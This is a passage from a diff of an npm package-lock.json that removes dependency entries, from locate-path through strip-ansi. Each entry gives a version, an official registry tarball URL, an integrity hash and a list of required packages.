"sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha1-vMbEmkKihA7Zl/Mj6tpezRguC/4=", - "dev": true - }, - "make-dir": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", - "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", - "dev": true, - "requires": { - "semver": "^7.5.3" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "requires": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - } - }, - "mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" - }, - "mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "requires": { - "mime-db": "1.52.0" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==" - }, - "minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", - "requires": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" - } - }, - "mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==" - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.18", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", - "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" - }, - "oauth4webapi": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", - "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", - "optional": true - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "requires": { - "wrappy": "1" - } - }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "requires": { - "mimic-fn": "^2.1.0" - } - }, - "openid-client": { - "version": "6.1.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", - "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, - "requires": { - "jose": "^5.9.6", - "oauth4webapi": "^3.1.1" - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - }, - "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - } - } - }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "package-json-from-dist": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", - "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==" - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - } - }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==" - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "path-scurry": { - "version": "1.11.1", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", - "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", - "requires": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - }, - "dependencies": { - "lru-cache": { - "version": "10.4.3", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", - "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==" - } - } - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" - }, - "picocolors": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", - "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true - }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - } - }, - "pretty-format": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", - "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.3", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } - }, - "psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" - }, - "punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==" - }, - "pure-rand": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", - "dev": true - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" - }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } - } - }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true - }, - "resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, - "requires": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - } - }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - } - }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true - }, - "rfc4648": { - "version": "1.5.1", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.1.tgz", - "integrity": "sha512-60e/YWs2/D3MV1ErdjhJHcmlgnyLUiG4X/14dgsfm9/zmCWLN16xI6YqJYSCd/OANM7bUNzJqPY5B8/02S9Ibw==" - }, - "rimraf": { - "version": "5.0.10", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.10.tgz", - "integrity": "sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==", - "requires": { - "glob": "^10.3.7" - }, - "dependencies": { - "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "requires": { - "balanced-match": "^1.0.0" - } - }, - "glob": { - "version": "10.4.5", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", - "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", - "requires": { - "foreground-child": "^3.1.0", - "jackspeak": "^3.1.2", - "minimatch": "^9.0.4", - "minipass": "^7.1.2", - "package-json-from-dist": "^1.0.0", - "path-scurry": "^1.11.1" - } - }, - "minimatch": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", - "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", - "requires": { - "brace-expansion": "^2.0.1" - } - } - } - }, - "safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" - }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==" - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true - }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - } - }, - "stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "requires": { - "escape-string-regexp": "^2.0.0" - } - }, - "stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" - }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "string-width-cjs": { - "version": "npm:string-width@4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - }, 